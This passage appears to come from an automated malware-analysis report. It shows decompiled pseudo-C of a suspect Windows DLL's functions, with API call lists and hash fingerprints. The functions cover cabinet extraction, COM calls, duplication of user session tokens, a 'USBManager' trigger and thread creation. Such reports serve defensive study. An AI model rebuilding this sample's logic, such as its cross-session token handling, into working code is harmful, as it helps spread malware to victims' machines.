    				_push(E6ECA1030);
    				_v312 = 0;
    				L6ECAC3A2();
    				_t40 = _t18;
    				_t48 =  &(( &_v312)[9]);
    				if(_t40 == 0) {
    					return 0;
    				} else {
    					_t32 = _a4;
    					_t20 = CreateFileA(_t32, 0xc0000000, 3, 0, 3, 0x80, 0);
    					_t42 = _t20;
    					if(_t42 != 0xffffffff) {
    						_push( &_v288);
    						_push(_t42);
    						_push(_t40);
    						L6ECAC39C();
    						_t48 =  &(_t48[3]);
    						CloseHandle(_t42);
    						if(_t20 != 0) {
    							_t43 = _a12;
    							if(_t43 != 0) {
    								_v312 = GetTickCount();
    								 *0x6ecb0270 = RtlRandom( &_v312);
    							}
    							lstrcpyA( &_v264, _t32);
    							PathRemoveFileSpecA( &_v264);
    							PathAddBackslashA( &_v264);
    							_push( &_v308);
    							_push(0);
    							_push(E6ECA1100);
    							_push(0);
    							_push( &_v264);
    							_v304 = _a8;
    							_v308 = _t43;
    							_t28 = PathFindFileNameA(_t32);
    							_push(_t28);
    							_push(_t40);
    							L6ECAC396();
    							_t48 =  &(_t48[7]);
    							_v312 = _t28;
    						}
    					}
    					_push(_t40);
    					L6ECAC390();
    					return _v312;
    				}
    			}

    APIs
    • #20.CABINET(Function_00001030,Function_00001050,Function_00001000,Function_00001070,Function_000010A0,Function_000010D0,Function_000010E0,000000FF,?), ref: 6ECA12F8
    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 6ECA1323
    • #21.CABINET(00000000,00000000,?), ref: 6ECA133C
    • CloseHandle.KERNEL32(00000000), ref: 6ECA1347
    • GetTickCount.KERNEL32 ref: 6ECA135D
    • RtlRandom.NTDLL(?), ref: 6ECA136C
    • lstrcpyA.KERNEL32(?,?), ref: 6ECA137D
    • PathRemoveFileSpecA.SHLWAPI(?), ref: 6ECA1388
    • PathAddBackslashA.SHLWAPI(?), ref: 6ECA1393
    • PathFindFileNameA.SHLWAPI(?,?,00000000,Function_00001100,00000000,?), ref: 6ECA13BC
    • #22.CABINET(00000000,00000000), ref: 6ECA13C4
    • #23.CABINET(00000000), ref: 6ECA13D1
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: FilePath$BackslashCloseCountCreateFindHandleNameRandomRemoveSpecTicklstrcpy
    • String ID:
    • API String ID: 4034828233-0
    • Opcode ID: 8286aa1da5d7bae3d49178d387e313f54b381b126331a908b86af69f2a44ba6e
    • Instruction ID: 5dcbd95c06e15feb8a09b3b09028ae167ec8abb9c431b73c1989511e5c290f38
    • Opcode Fuzzy Hash: 8286aa1da5d7bae3d49178d387e313f54b381b126331a908b86af69f2a44ba6e
    • Instruction Fuzzy Hash: 3D31C2B54053026FC710DBACDC44FEFBBB8AB85765F004A19FA6997380F77095098B92
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 54%
    			E6ECA4760() {
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v24;
    				intOrPtr _v28;
    				signed int _v32;
    				char _v36;
    				void* _v44;
    				intOrPtr _v48;
    				void* _v52;
    				intOrPtr _v60;
    				char _v64;
    				intOrPtr* _v68;
    				char _v76;
    				intOrPtr _v80;
    				void* _v84;
    				WCHAR* _v92;
    				intOrPtr* _v104;
    				intOrPtr* _v112;
    				intOrPtr* _v120;
    				intOrPtr* _v128;
    				intOrPtr* _v136;
    				intOrPtr* _v144;
    				intOrPtr* _v148;
    				intOrPtr _v152;
    				intOrPtr* _v160;
    				char* _t80;
    				intOrPtr* _t82;
    				intOrPtr* _t85;
    				intOrPtr* _t88;
    				intOrPtr* _t92;
    				intOrPtr* _t95;
    				char* _t98;
    				intOrPtr _t99;
    				intOrPtr* _t100;
    				intOrPtr* _t102;
    				intOrPtr* _t104;
    				intOrPtr* _t106;
    				intOrPtr* _t108;
    				intOrPtr* _t110;
    				intOrPtr* _t112;
    				intOrPtr* _t115;
    				intOrPtr* _t117;
    				intOrPtr* _t120;
    				int _t123;
    				intOrPtr* _t124;
    				intOrPtr* _t126;
    				WCHAR* _t128;
    				intOrPtr* _t130;
    				intOrPtr* _t132;
    				signed int _t134;
    				intOrPtr* _t138;
    				intOrPtr* _t161;
    				char _t185;
    				void* _t186;
    				char _t189;
    				char _t190;
    				signed int* _t191;
    				WCHAR* _t194;
    
    				_t80 =  &_v16;
    				_t185 = 0;
    				_v12 = 0;
    				_v8 = 0;
    				_v16 = 0;
    				__imp__CoCreateInstance(0x6ecae0bc, 0, 1, 0x6ecae07c, _t80);
    				if(_t80 < 0) {
    					L35:
    					return _v32;
    				}
    				_t82 = _v36;
    				_v24 = 0;
    				_push( &_v24);
    				_push(_t82);
    				if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x1c))))() < 0) {
    					L10:
    					_t85 = _v44;
    					_v52 = _t185;
    					_push( &_v52);
    					_push(_t85);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x48))))() < 0) {
    						L34:
    						_t88 = _v52;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
    						if(_v48 != _t185) {
    							return 1;
    						}
    						goto L35;
    					}
    					_t138 = __imp__#2;
    					_t194 =  *_t138(_v28);
    					if(_t194 == _t185) {
    						L33:
    						_t92 = _v64;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
    						goto L34;
    					}
    					_t186 =  *_t138(_v28);
    					_t189 = 0;
    					if(_t186 == 0) {
    						L32:
    						__imp__#6(_t194);
    						_t185 = 0;
    						goto L33;
    					}
    					_t95 = _v68;
    					_push( &_v64);
    					_v64 = 0;
    					_push(_t186);
    					_push(_t95);
    					if( *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x28))))() < 0) {
    						L21:
    						if(_v52 != _t189) {
    							_t98 =  &_v84;
    							_v84 = _t189;
    							__imp__CoCreateInstance(0x6ecae09c, _t189, 1, 0x6ecae06c, _t98);
    							if(_t98 >= 0) {
    								_t99 = _v60;
    								if(_t99 != 0) {
    									_t189 =  *_t138(_t99);
    								}
    								_t100 = _v104;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x30))))(_t100, _t194);
    								_t102 = _v112;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 0x20))))(_t102, _t186);
    								if(_t189 != 0) {
    									_t117 = _v120;
    									 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x28))))(_t117, _t189);
    								}
    								_t104 = _v120;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x40))))(_t104, 0x100);
    								_t106 = _v128;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x98))))(_t106, 0x7fffffff);
    								_t108 = _v136;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0xa8))))(_t108, 1);
    								_t110 = _v144;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x88))))(_t110, 0xffffffff);
    								_t112 = _v148;
    								_push(_v152);
    								_push(_t112);
    								if( *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x20))))() >= 0) {
    									_v144 = 1;
    								}
    								_t115 = _v160;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))(_t115);
    								if(_t189 != 0) {
    									__imp__#6(_t189);
    								}
    							}
    						}
    						L31:
    						__imp__#6(_t186);
    						goto L32;
    					}
    					_t120 = _v76;
    					_v84 = 0;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x2c))))(_t120,  &_v84);
    					_t123 = lstrcmpiW(_t194, _v92);
    					_t190 = _v44;
    					if(_t123 == 0) {
    						if(_t190 == 0) {
    							_t130 = _v84;
    							_v76 = _t190;
    							 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0x84))))(_t130,  &_v76);
    							if(_v84 == _t190) {
    								_t132 = _v92;
    								 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x88))))(_t132, 0xffffffff);
    							}
    						}
    						_v76 = 1;
    					}
    					_t124 = _v84;
    					 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
    					if(_v80 != 0) {
    						if(_t190 != 0) {
    							_t126 = _v92;
    							 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x24))))(_t126, _t186);
    						}
    						goto L31;
    					} else {
    						_t128 = _v92;
    						 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 0x24))))(_t128, _t186);
    						_t189 = 0;
    						goto L21;
    					}
    				} else {
    					_t191 = 0x6ecad820;
    					do {
    						_t134 =  *_t191;
    						if((_v32 & _t134) == 0) {
    							goto L7;
    						}
    						_t161 = _v44;
    						_push( &_v36);
    						_v36 = _t185;
    						_push(_t134);
    						_push(_t161);
    						if( *((intOrPtr*)( *((intOrPtr*)( *_t161 + 0x20))))() < 0 || _v48 != _t185) {
    							_v48 = _t185;
    							goto L10;
    						} else {
    							_v48 = 1;
    						}
    						L7:
    						_t191 =  &(_t191[1]);
    					} while (_t191 < "\"%s\" f");
    					goto L10;
    				}
    			}

    APIs
    • CoCreateInstance.OLE32(6ECAE0BC,00000000,00000001,6ECAE07C,?), ref: 6ECA4789
    • SysAllocString.OLEAUT32(?), ref: 6ECA481D
    • SysAllocString.OLEAUT32(?), ref: 6ECA482E
    • lstrcmpiW.KERNEL32(00000000,?), ref: 6ECA4875
    • CoCreateInstance.OLE32(6ECAE09C,00000000,00000001,6ECAE06C,?), ref: 6ECA4905
    • SysAllocString.OLEAUT32(?), ref: 6ECA491C
    • SysFreeString.OLEAUT32(00000000), ref: 6ECA49C0
    • SysFreeString.OLEAUT32(00000000), ref: 6ECA49C7
    • SysFreeString.OLEAUT32(00000000), ref: 6ECA49CE
    Strings
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: String$AllocFree$CreateInstance$lstrcmpi
    • String ID: "%s" f
    • API String ID: 1501015606-2173819097
    • Opcode ID: 699d21780a74539649f8d449b82a608bf5936c12e38e64c0596b1243c17d53c0
    • Instruction ID: 3ec5ac6e77019d9a85b7e66751fb3d00d2a8eaff7f7e9087a7005136bf639b50
    • Opcode Fuzzy Hash: 699d21780a74539649f8d449b82a608bf5936c12e38e64c0596b1243c17d53c0
    • Instruction Fuzzy Hash: 999106756047029FC610DFA9C880D5BB7E9BFC9704F104A5CFA999B354EB31E846CBA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 72%
    			E6ECA34B0() {
    				void* _t32;
    				void* _t33;
    				void* _t35;
    				void* _t53;
    				void* _t55;
    				void* _t58;
    				void* _t59;
    				void* _t61;
    				void* _t64;
    				void* _t65;
    
    				_t59 =  *(_t65 + 0x20);
    				 *(_t65 + 0x10) = 0;
    				_t64 = 0;
    				do {
    					 *(_t65 + 0x20) = 0;
    					 *(_t65 + 0x14) = 0;
    					if(_t59 != 0xffffffff) {
    						_push(_t65 + 0x14);
    						_t32 = _t65 + 0x24;
    						_push(_t32);
    						_push(8);
    						_push(_t59);
    						_push(0);
    						L6ECAC36C();
    						if(_t32 == 0) {
    							goto L14;
    						} else {
    							_t35 =  *(_t65 + 0x20);
    							if( *_t35 == 0) {
    								 *(_t65 + 0x10) = 1;
    							}
    							_push(_t35);
    							goto L13;
    						}
    					} else {
    						_t33 = _t65 + 0x14;
    						_push(_t33);
    						_push(_t65 + 0x24);
    						_push(1);
    						_push(0);
    						_push(0);
    						L6ECAC372();
    						if(_t33 == 0) {
    							goto L14;
    						} else {
    							_t55 =  *(_t65 + 0x14);
    							_t61 =  *(_t65 + 0x20);
    							_t53 = 0;
    							_t35 = _t61;
    							if(_t55 <= 0) {
    								L8:
    								_push(_t61);
    							} else {
    								while( *((intOrPtr*)(_t35 + 8)) != 0) {
    									_t53 = _t53 + 1;
    									_t35 = _t35 + 0xc;
    									if(_t53 < _t55) {
    										continue;
    									} else {
    										_push(_t61);
    									}
    									goto L13;
    								}
    								_t59 =  *_t35;
    								 *(_t65 + 0x10) = 1;
    								goto L8;
    							}
    							L13:
    							L6ECAC366();
    							if( *(_t65 + 0x10) != 0) {
    								_push(_t65 + 0x14);
    								_push(_t59);
    								 *((intOrPtr*)(_t65 + 0x1c)) = 0;
    								L6ECAC360();
    								if(_t35 == 0) {
    									break;
    								} else {
    									 *((intOrPtr*)(_t65 + 0x38)) = 0;
    									if(DuplicateTokenEx( *(_t65 + 0x14), 0x2000000, 0, 1, 1, _t65 + 0x20) == 0) {
    										break;
    									} else {
    										_push(4);
    										_push(_t65 + 0x14);
    										 *(_t65 + 0x20) = 0;
    										L6ECAC2EE();
    										if(GetTokenInformation( *(_t65 + 0x20), 0x13, _t65 + 0x18, 4, _t65 + 0x18) != 0) {
    											CloseHandle( *(_t65 + 0x20));
    											CloseHandle( *(_t65 + 0x14));
    											return  *(_t65 + 0x10);
    										} else {
    											_t58 =  *(_t65 + 0x20);
    											 *(_t65 + 0x14) = _t58;
    											CloseHandle( *(_t65 + 0x14));
    											return _t58;
    										}
    									}
    								}
    							} else {
    								goto L14;
    							}
    						}
    					}
    					L21:
    					L14:
    					Sleep(0x1f4);
    					_t64 = _t64 + 1;
    				} while (_t64 < 0x78);
    				return 0;
    				goto L21;
    			}

    APIs
    • WTSEnumerateSessionsA.WTSAPI32(00000000,00000000,00000001,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA34DE
    • WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000008,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA3522
    • WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA353C
    • Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA354C
    • WTSQueryUserToken.WTSAPI32(?,?,?,00000000,?,00000008,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA3570
    • DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?,?,00000000,?,00000008,?,?,00000000,76D24F20), ref: 6ECA3591
    • RtlZeroMemory.NTDLL(?,00000004), ref: 6ECA35A6
    • GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?,00000000,76D24F20), ref: 6ECA35BE
    • CloseHandle.KERNEL32(?,?,?,00000000,76D24F20), ref: 6ECA35DD
    • CloseHandle.KERNEL32(?,?,?,00000000,76D24F20), ref: 6ECA35EE
    • CloseHandle.KERNEL32(?,?,?,00000000,76D24F20), ref: 6ECA35F9
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseHandleToken$InformationMemoryQuery$DuplicateEnumerateFreeSessionSessionsSleepUserZero
    • String ID:
    • API String ID: 935900411-0
    • Opcode ID: 804ae7cbdb969b8b10d99112f8d6eba4ac4a725412c9c7118854d71588c3239f
    • Instruction ID: 7dc2e3a31fb2f312b8238b17dc4d6b0c5ab4338883792b415c094aeb1181f8da
    • Opcode Fuzzy Hash: 804ae7cbdb969b8b10d99112f8d6eba4ac4a725412c9c7118854d71588c3239f
    • Instruction Fuzzy Hash: 0B415F712083069BD700DF9DD994AAFB7E9FBC4B14F004A2DFA95A7140E774D9098BA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 56%
    			E6ECABBBE(intOrPtr _a4, long _a8, intOrPtr _a12) {
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* __ebp;
    				void* _t12;
    				void* _t13;
    				void* _t14;
    				void* _t16;
    				long _t20;
    				void* _t22;
    				long _t24;
    				void* _t26;
    				long _t36;
    				signed int _t38;
    				void* _t39;
    				char _t43;
    
    				if(_a8 != 0) {
    					__eflags = _a8 - 1;
    					if(_a8 != 1) {
    						L33:
    						return 1;
    					}
    					_t24 =  *( *[fs:0x18] + 4);
    					_a8 = 0;
    					_push(0);
    					while(1) {
    						_t12 = InterlockedCompareExchange(0x6ecb0964, _t24, ??);
    						__eflags = _t12;
    						if(_t12 == 0) {
    							break;
    						}
    						__eflags = _t12 - _t24;
    						if(_t12 == _t24) {
    							_a8 = 1;
    							L11:
    							_t13 =  *0x6ecb0960; // 0x0
    							_t36 = 2;
    							__eflags = _t13;
    							if(_t13 == 0) {
    								 *0x6ecb0960 = 1;
    								_t14 = E6ECABB78(0x6ecad47c, 0x6ecad484);
    								__eflags = _t14;
    								if(_t14 != 0) {
    									L3:
    									return 0;
    								}
    								_push(0x6ecad478);
    								_push(0x6ecad474);
    								L6ECAC0B0();
    								 *0x6ecb0960 = _t36;
    								L15:
    								__eflags = _a8;
    								if(_a8 == 0) {
    									InterlockedExchange(0x6ecb0964, 0);
    								}
    								__eflags =  *0x6ecb0974; // 0x0
    								if(__eflags != 0) {
    									_push(0x6ecb0974);
    									_t16 = E6ECAC044(0, _t36, 0x6ecb0964, __eflags);
    									__eflags = _t16;
    									if(_t16 != 0) {
    										 *0x6ecb0974(_a4, _t36, _a12);
    									}
    								}
    								"mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" + 1;
    								goto L33;
    							}
    							_push(0x1f);
    							L6ECAC0B6();
    							goto L15;
    						}
    						Sleep(0x3e8);
    						_push(0);
    					}
    					goto L11;
    				}
    				_t43 = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD"; // 0x0
    				if(_t43 <= 0) {
    					goto L3;
    				}
    				"mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" - 1;
    				_push(0);
    				while(InterlockedCompareExchange(0x6ecb0964, 1, ??) != 0) {
    					Sleep(0x3e8);
    					_push(0);
    				}
    				_t20 =  *0x6ecb0960; // 0x0
    				if(_t20 == 2) {
    					_t26 =  *0x6ecb096c; // 0x0
    					__eflags = _t26;
    					if(_t26 == 0) {
    						L32:
    						 *0x6ecb0960 = 0;
    						InterlockedExchange(0x6ecb0964, 0);
    						goto L33;
    					}
    					_t38 =  *0x6ecb0968; // 0x0
    					_t39 = _t38 + 0xfffffffc;
    					while(1) {
    						__eflags = _t39 - _t26;
    						if(_t39 < _t26) {
    							break;
    						}
    						_t22 =  *_t39;
    						__eflags = _t22;
    						if(_t22 != 0) {
    							 *_t22();
    						}
    						_t39 = _t39 - 4;
    						__eflags = _t39;
    					}
    					free(_t26);
    					 *0x6ecb0968 =  *0x6ecb0968 & 0x00000000;
    					 *0x6ecb096c =  *0x6ecb096c & 0x00000000;
    					__eflags =  *0x6ecb096c;
    					goto L32;
    				}
    				_push(0x1f);
    				L6ECAC0B6();
    				goto L33;
    			}

    APIs
    • InterlockedCompareExchange.KERNEL32(6ECB0964,?,00000000), ref: 6ECABC2B
    • _amsg_exit.MSVCRT ref: 6ECABC48
    • InterlockedExchange.KERNEL32(6ECB0964,00000000), ref: 6ECABC92
    • Sleep.KERNEL32(000003E8), ref: 6ECABCC9
    • InterlockedCompareExchange.KERNEL32(6ECB0964,00000001,00000000), ref: 6ECABCD4
    • _amsg_exit.MSVCRT ref: 6ECABCE6
    • free.MSVCRT(00000000), ref: 6ECABD13
    • InterlockedExchange.KERNEL32(6ECB0964,00000000), ref: 6ECABD35
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: ExchangeInterlocked$Compare_amsg_exit$Sleepfree
    • String ID:
    • API String ID: 1670123637-0
    • Opcode ID: d5c2447d12fe669750a5e7d24232425520560f376ec0823f886e597efcf1d441
    • Instruction ID: 0d18021f2b6a76bf5fa48d4c0a64a963312d529dadddb6a2fcdcaf95438f17a0
    • Opcode Fuzzy Hash: d5c2447d12fe669750a5e7d24232425520560f376ec0823f886e597efcf1d441
    • Instruction Fuzzy Hash: 9F41817294560BDFEB409BEE9A85F9A3778BF42329F004529FB119A18DFB3194418B11
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 95%
    			E6ECA5060(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v256;
    				char _v264;
    				intOrPtr _t11;
    				intOrPtr _t18;
    				void* _t21;
    				intOrPtr _t22;
    				void* _t23;
    				char* _t24;
    				void* _t29;
    
    				_t24 =  &_v264;
    				_t18 = _a12;
    				_t22 = _a8;
    				_t21 = 0;
    				if(_t22 != 0 || _t18 != 0) {
    					_t29 = M6ECB050C - _t21; // 0x0
    					if(_t29 != 0) {
    						E6ECA3700("USBManager", 0);
    						_t24 =  &(_t24[8]);
    					}
    					if(_t22 == 0) {
    						if(_t18 == 0) {
    							goto L8;
    						}
    						goto L9;
    					} else {
    						_t11 = M6ECB057C; // 0x0
    						wsprintfA( &_v264, "%s%s%c", "Global\\", _t11, 0x52);
    						_t23 = OpenEventA(2, 0,  &_v256);
    						if(_t23 == 0) {
    							goto L10;
    						} else {
    							SetEvent(_t23);
    							CloseHandle(_t23);
    							return _t21;
    						}
    					}
    				} else {
    					L8:
    					_push(0);
    					_t21 = E6ECA4FE0(_a4);
    					L9:
    					CloseHandle(CreateThread(0, 0, 0x6eca2d50, 0, 0, 0));
    					L10:
    					return _t21;
    				}
    			}

    APIs
    • wsprintfA.USER32 ref: 6ECA50B3
    • OpenEventA.KERNEL32(00000002,00000000,?), ref: 6ECA50C5
    • SetEvent.KERNEL32(00000000), ref: 6ECA50D2
    • CloseHandle.KERNEL32(00000000), ref: 6ECA50D9
    • CreateThread.KERNEL32 ref: 6ECA5112
    • CloseHandle.KERNEL32(00000000), ref: 6ECA5119
    Memory Dump Source
    • Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true
    • Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp
    • Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp
    • Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp
    Similarity
    • API ID: CloseEventHandle$CreateOpenThreadwsprintf
    • String ID: %s%s%c$Global\$USBManager
    • API String ID: 1587369599-1541125816
    • Opcode ID: 292c0cd5cff24c4b9635e4461da13a40e671845aa5d9328e71ac2081b92c54e4
    • Instruction ID: 29d9725330f17b246bbdd0fa19c3c1476ef1298472b56adea02af017a3faaa1b
    • Opcode Fuzzy Hash: 292c0cd5cff24c4b9635e4461da13a40e671845aa5d9328e71ac2081b92c54e4
    • Instruction Fuzzy Hash: 47113D76B40B126BE66056DC9D06FDF3B38AF85B16F008424FF549B284FA6594098FF1
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 84%
    			E6ECA9C50(struct HWND__* _a4, intOrPtr _a8, char _a12) {
    				intOrPtr _t5;
    				void* _t15;
    				char _t21;
    				struct HWND__* _t26;
    
    				_t5 = _a8;
    				if(_t5 == 0) {
    					_t26 = _a4;
    					SetWindowLongA(_t26, 0xffffffec, GetWindowLongA(_t26, 0xffffffec) | 0x00000008);
    					SetWindowPos(_t26, 0xffffffff, 0, 0, 0, 0, 3);
    					BringWindowToTop(_t26);
    					SetForegroundWindow(_t26);
    					SendMessageA(_t26, 0x473, 1, 1);
    					SendMessageA(_t26, 0x46f, 8, 0);
    					goto L7;
    				} else {
    					_t15 = _t5 - 2;
    					if(_t15 == 0) {
